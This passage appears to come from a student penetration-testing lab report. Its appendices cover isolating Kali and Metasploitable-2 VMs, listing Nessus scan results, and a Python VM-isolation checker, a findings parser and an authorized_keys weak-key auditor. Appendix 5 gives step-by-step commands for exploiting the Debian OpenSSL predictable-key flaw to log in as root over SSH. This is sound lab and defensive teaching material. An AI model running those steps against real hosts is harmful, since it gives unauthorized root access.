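    """Dictionary of the key=value lines; lines with quoted keys are ignored."""
    info = {}
    for line in text.splitlines():
        m = KV_RE.match(line)
        if m:
            info[m["key"]] = m["quoted"] if m["quoted"] is not None else m["bare"]
    return info


def nic_modes(info):
    """{adapter number: attachment mode} for adapters that are not 'none'."""
    modes = {}
    for key, value in info.items():
        m = re.fullmatch(r"nic(\d+)", key)
        if m and value != "none":
            modes[int(m.group(1))] = value
    return modes


def check_isolation(info, allowed=("hostonly", "intnet")):
    """Return (level, message) findings. Bridged is an error because the VM
    joins the physical LAN; NAT is a warning because inbound is blocked but
    the VM can still reach the host's network and the Internet."""
    findings = []
    modes = nic_modes(info)
    for n, mode in sorted(modes.items()):
        if mode in allowed:
            continue
        level = "ERROR" if mode == "bridged" else "WARNING"
        detail = info.get(f"bridgeadapter{n}", "")
        findings.append((level, f"nic{n} is {mode}" + (f" via {detail}" if detail else "")))
    if not modes:
        findings.append(("WARNING", "no network adapter is attached"))
    return findings


if __name__ == "__main__":
    # Pipe real output in, or fall back to the constructed leaky sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else LEAKY_VM
    info = parse_showvminfo(text)
    for level, msg in check_isolation(info) or [("OK", "lab isolation holds")]:
        print(f"{info.get('name', '?')}: {level}: {msg}")
```

Run it on the host as `VBoxManage showvminfo "Kali" --machinereadable | python3 check_vbox_nic.py` before starting the Metasploitable-2 VM; any ERROR line means the target VM is reachable from the office LAN.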


Figure 2: VirtualBox Manager System Motherboard Preferences.

Figure 3: VirtualBox Manager System Processor Preferences.


Figure 4: VirtualBox Manager Display Processor Preferences.

Figure 5: VirtualBox Manager Network Adapter Preferences.


Figure 6: VirtualBox Manager Network Host-only setting vs. Bridged setting.

Figure 7: VirtualBox Manager Storage Preference for Kali Linux ISO installation.

Start your Kali VM. The Kali Linux ISO will begin to install itself. Choose the GUI installation interface
and accept all default recommendations.


Appendix 3: Metasploitable-2 Installation and Ethernet configuration

Download the Metasploitable-2 Virtual Machine Disk image (VMDK) from
https://sourceforge.net/projects/metasploitable/.

Create a new Metasploitable-2 VM in VirtualBox using the downloaded Metasploitable-2 VMDK
image.

Figure 1: Communication between the Kali Linux VM and the Metasploitable-2 VM.

Confirm that the VM Promiscuous Mode is enabled.


Start the Kali Linux VM in Host-only network mode.

a) Log in as root.
b) Open a Terminal window.
c) Run ifconfig to obtain the IP address assigned to the Kali Linux VM and confirm it is in the correct
subnet.

Figure 2: Confirm the Kali Linux VM is assigned to the correct subnet.

Start the Metasploitable-2 VM.

a) Log in as the default user msfadmin; the password is msfadmin.
b) Open a Terminal window.
c) Run ifconfig to obtain the IP address assigned to the Metasploitable-2 VM and confirm it is in the
correct subnet.

Figure 3: Confirm the Metasploitable-2 VM is assigned to the correct subnet.


Appendix 4: Results of Metasploitable-2 Vulnerability Scan using Nessus

Scanned host: 192.168.56.102

Critical  High  Medium  Low  Info  Total
8         2     22      8    65    105

Severity (CVSS) Plugin Id Name

Critical (10.0) 10203 rexecd Service Detection
Critical (10.0) 32314 Debian OpenSSH/OpenSSL Package Random Number Generator Weakness
Critical (10.0) 32321 Debian OpenSSH/OpenSSL Package Random Number Generator Weakness (SSL check)
Critical (10.0) 33850 Unix Operating System Unsupported Version Detection
Critical (10.0) 34970 Apache Tomcat Manager Common Administrative Credentials
Critical (10.0) 51988 Rogue Shell Backdoor Detection
Critical (10.0) 55523 vsftpd Smiley Face Backdoor
Critical (10.0) 61708 VNC Server 'password' Password
High (7.5) 10205 rlogin Service Detection
High (7.5) 34460 Unsupported Web Server Detection
Medium (6.8) 82580 Samba 3.0.0 'SamrChangePassword' RCE
Medium (6.8) 90509 Samba Badlock Vulnerability
Medium (6.4) 11356 NFS Exported Share Information Disclosure
Medium (6.4) 51192 SSL Certificate Cannot Be Trusted
Medium (6.4) 57582 SSL Self-Signed Certificate
Medium (5.8) 42263 Unencrypted Telnet Server
Medium (5.0) 10079 Anonymous FTP Enabled
Medium (5.0) 11213 HTTP TRACE / TRACK Methods Allowed
Medium (5.0) 15901 SSL Certificate Expiry
Medium (5.0) 20007 SSL Version 2 and 3 Protocol Detection
Medium (5.0) 42256 NFS Shares World Readable
Medium (5.0) 42873 SSL Medium Strength Cipher Suites Supported
Medium (5.0) 45411 SSL Certificate with Wrong Hostname
Medium (5.0) 57608 SMB Signing Disabled
Medium (5.0) 81606 SSL/TLS EXPORT_RSA <= 512-bit Cipher Suites Supported (FREAK)
Medium (5.0) 94437 SSL 64-bit Block Size Cipher Suites Supported (SWEET32)
Medium (4.3) 26928 SSL Weak Cipher Suites Supported
Medium (4.3) 57792 Apache HTTP Server httpOnly Cookie Information Disclosure
Medium (4.3) 78479 SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
Medium (4.3) 90317 SSH Weak Algorithms Supported
Medium (4.0) 52611 SMTP Service STARTTLS Plaintext Command Injection

Medium (4.0) 89058 SSL DROWN Attack Vulnerability (Decrypting RSA with Obsolete and Weakened eNcryption)
Low (2.6) 10407 X Server Detection
Low (2.6) 31705 SSL Anonymous Cipher Suites Supported
Low (2.6) 34324 FTP Supports Cleartext Authentication
Low (2.6) 65821 SSL RC4 Cipher Suites Supported (Bar Mitzvah)
Low (2.6) 70658 SSH Server CBC Mode Ciphers Enabled
Low (2.6) 71049 SSH Weak MAC Algorithms Enabled
Low (2.6) 83738 SSL/TLS EXPORT_DHE <= 512-bit Export Cipher Suites Supported (Logjam)
Low (2.6) 83875 SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam)
Info 10028 DNS Server BIND version Directive Remote Version Detection
Info 10092 FTP Server Detection
Info 10107 HTTP Server Type and Version
Info 10114 ICMP Timestamp Request Remote Date Disclosure
Info 10150 Windows NetBIOS / SMB Remote Host Information Disclosure
Info 10223 RPC portmapper Service Detection
Info 10263 SMTP Server Detection
Info 10267 SSH Server Type and Version Information
Info 10281 Telnet Server Detection
Info 10287 Traceroute Information
Info 10342 VNC Software Detection
Info 10394 Microsoft Windows SMB Log In Possible
Info 10397 Microsoft Windows SMB LanMan Pipe Server Listing Disclosure
Info 10437 NFS Share Export List
Info 10719 MySQL Server Detection
Info 10785 Microsoft Windows SMB NativeLanManager Remote System Information Disclosure
Info 10863 SSL Certificate Information
Info 10881 SSH Protocol Versions Supported
Info 11002 DNS Server Detection
Info 11011 Microsoft Windows SMB Service Detection
Info 11111 RPC Services Enumeration
Info 11153 Service Detection (HELP Request)
Info 11154 Unknown Service Detection: Banner Retrieval
Info 11219 Nessus SYN scanner
Info 11422 Web Server Unconfigured - Default Install Page Present
Info 11424 WebDAV Detection
Info 11819 TFTP Daemon Detection
Info 11936 OS Identification
Info 18261 Apache Banner Linux Distribution Disclosure
Info 19288 VNC Server Security Type Detection
Info 19506 Nessus Scan Information
Info 20108 Web Server / Application favicon.ico Vendor Fingerprinting
Info 21186 AJP Connector Detection
Info 21643 SSL Cipher Suites Supported
Info 22227 RMI Registry Detection
Info 22964 Service Detection
Info 24260 HyperText Transfer Protocol (HTTP) Information
Info 25220 TCP/IP Timestamps Supported
Info 25240 Samba Server Detection
Info 26024 PostgreSQL Server Detection
Info 35371 DNS Server hostname.bind Map Hostname Disclosure
Info 35716 Ethernet Card Manufacturer Detection
Info 39446 Apache Tomcat Default Error Page Version Detection
Info 39519 Backported Security Patch Detection (FTP)
Info 39520 Backported Security Patch Detection (SSH)
Info 39521 Backported Security Patch Detection (WWW)
Info 42088 SMTP Service STARTTLS Command Support
Info 45410 SSL Certificate commonName Mismatch
Info 45590 Common Platform Enumeration (CPE)
Info 48243 PHP Version
Info 50845 OpenSSL Detection
Info 51891 SSL Session Resume Supported
Info 52703 vsftpd Detection
Info 53335 RPC portmapper (TCP)
Info 54615 Device Type
Info 56984 SSL / TLS Versions Supported
Info 57041 SSL Perfect Forward Secrecy Cipher Suites Supported
Info 62563 SSL Compression Methods Supported
Info 65792 VNC Server Unencrypted Communication Detection
Info 66334 Patch Report
Info 70544 SSL Cipher Block Chaining Cipher Suites Supported
Info 70657 SSH Algorithms and Languages Supported
Info 72779 DNS Server Version Detection
Info 84574 Backported Security Patch Detection (PHP)
Info 96982 Server Message Block (SMB) Protocol Version 1 Enabled (uncredentialed check)

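The summary row and findings table above are the raw material for triage. As an added example (not part of the original report or of Nessus itself), the Python below parses rows in the same "Severity (score) PluginId Name" layout, reconciles them against the summary counts, orders them for remediation by CVSS score, and groups related findings such as the SSL/TLS ones; the embedded rows are a constructed subset of the table above.

```python
import re
from collections import Counter

# Constructed sample: a subset of the rows from the Nessus table above, in the same
# "Severity (score) PluginId Name" layout (Info rows carry no CVSS score).
SAMPLE_FINDINGS = """\
Critical (10.0) 10203 rexecd Service Detection
Critical (10.0) 32314 Debian OpenSSH/OpenSSL Package Random Number Generator Weakness
Critical (10.0) 55523 vsftpd Smiley Face Backdoor
High (7.5) 10205 rlogin Service Detection
Medium (5.0) 20007 SSL Version 2 and 3 Protocol Detection
Medium (4.3) 78479 SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
Low (2.6) 65821 SSL RC4 Cipher Suites Supported (Bar Mitzvah)
Info 96982 Server Message Block (SMB) Protocol Version 1 Enabled (uncredentialed check)
"""

ROW_RE = re.compile(r"^(Critical|High|Medium|Low|Info)(?: \((\d+\.\d)\))? (\d+) (.+)$")
SEVERITY_ORDER = ["Critical", "High", "Medium", "Low", "Info"]

def parse_findings(text):
    """Parse well-formed rows into dicts; wrapped or malformed lines are skipped, not guessed."""
    findings = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        severity, score, plugin_id, name = m.groups()
        findings.append({"severity": severity, "score": float(score) if score else 0.0,
                         "plugin_id": int(plugin_id), "name": name})
    return findings

def severity_counts(findings):
    """Findings per severity, keyed in the order of the Nessus summary row."""
    c = Counter(f["severity"] for f in findings)
    return {s: c.get(s, 0) for s in SEVERITY_ORDER}

def reconcile(findings, summary):
    """True when the parsed rows match a summary row given as {severity: count, "Total": n}."""
    counts = severity_counts(findings)
    return all(counts[s] == summary[s] for s in SEVERITY_ORDER) and sum(counts.values()) == summary["Total"]

def remediation_order(findings):
    """Plugin ids sorted by descending CVSS score, then ascending id, as a fix-first work queue."""
    return [f["plugin_id"] for f in sorted(findings, key=lambda f: (-f["score"], f["plugin_id"]))]

def by_theme(findings, keyword):
    """Plugin ids whose name has a word starting with keyword, e.g. "SSL" matches SSLv3 but not OpenSSL."""
    pattern = re.compile(r"\b" + re.escape(keyword), re.IGNORECASE)
    return [f["plugin_id"] for f in findings if pattern.search(f["name"])]
```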

Appendix 5: Metasploit Private Key retrieval

This is a summary of how to regenerate the predictable SSH RSA key pair and use it to authenticate to the target host.[3]

root@kali:~# /pentest/exploits/exploitdb/searchsploit openssl

Find the script /multiple/remote/5622.txt

root@kali:~# cat /pentest/exploits/exploitdb/platforms/multiple/remote/5622.txt

Follow the instructions in the script to download the key archive from exploitdb.com

root@kali:~# wget http://www.

root@kali:~# tar -xvf debian_ssh_rsa_2048_x86.tar.bz2

root@kali:~# ls

root@kali:~# cd rsa

root@kali:~# ls

root@kali:~# cd 2048

root@kali:~# grep -lr [paste key] *.pub

That lists the name of the matching .pub file.

root@kali:~# ssh -i [paste matching filename without extension] root@192.168.56.102

Accept the host key prompt: Continue? Yes

root@kali:~# id

root@kali:~# whoami
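The appendix above shows the attacker's side of a predictable key; the defender's counterpart is to audit authorized_keys files for keys that appear on a weak-key blacklist. The Python below is an added example, not code from the original report or from any Debian or OpenSSH tooling: it rebuilds the ssh-rsa wire blob, computes the SHA256 fingerprint in the form ssh-keygen -l prints, and flags blacklisted entries. The sample keys, the authorized_keys text and the one-entry blacklist are all constructed (assumed) values, and a real blacklist would hold the fingerprints of every key the weak generator could produce.

```python
import base64
import hashlib
import struct

def _ssh_string(b):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b

def rsa_public_blob(e, n):
    """Wire blob behind an 'ssh-rsa AAAA...' line: string "ssh-rsa", mpint e, mpint n."""
    mpint = lambda v: _ssh_string(v.to_bytes((v.bit_length() + 8) // 8, "big"))  # sign bit stays clear
    return _ssh_string(b"ssh-rsa") + mpint(e) + mpint(n)

def fingerprint(blob):
    """SHA256 fingerprint in the form ssh-keygen -l prints (base64 without '=' padding)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")

def audit_authorized_keys(text, blacklist):
    """Return (line_no, key_type, fingerprint, comment) for each key whose fingerprint is blacklisted."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # An entry may begin with an options field, so locate the first token that is a key type.
        idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue  # malformed entry: nothing to check
        try:
            blob = base64.b64decode(parts[idx + 1], validate=True)
        except ValueError:
            continue  # not valid base64: sshd would reject it too
        fp = fingerprint(blob)
        if fp in blacklist:
            hits.append((line_no, parts[idx], fp, " ".join(parts[idx + 2:])))
    return hits

# Constructed sample keys: tiny moduli that are NOT real RSA keys, used only to exercise the code.
WEAK_BLOB = rsa_public_blob(65537, 0xC0FFEE1234567890ABCDEF)
GOOD_BLOB = rsa_public_blob(65537, 0xFEEDFACE0123456789ABCD)
b64 = lambda blob: base64.b64encode(blob).decode()
# Constructed authorized_keys content; the last entry carries a leading options field.
SAMPLE_AUTHORIZED_KEYS = f"""# constructed test data
ssh-rsa {b64(GOOD_BLOB)} admin@kali
ssh-rsa {b64(WEAK_BLOB)} msfadmin@metasploitable
from="192.168.56.1" ssh-rsa {b64(WEAK_BLOB)} backup@host
"""

# Constructed stand-in for a weak-key blacklist; any match means the key must be revoked and regenerated.
BLACKLIST = {fingerprint(WEAK_BLOB)}
```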

References

[1] Burnham, J. (2015, July 23). Who is a Leader (again) in Gartner's 2015 Magic Quadrant For Security Information Event Management? Retrieved February 4, 2017, from https://securityintelligence.com/ibm-is-a-leader-again-in-2015-gartner-magic-quadrant-for-siem/
[2] Linkletter, B. (2017, January 31). Open-Source Network Simulators. Retrieved February 6, 2017, from http://www.brianlinkletter.com/open-source-network-simulators/
[3] Metasploit Tomcat server. https://www.youtube.com/watch?v=o8_qLxPW--s
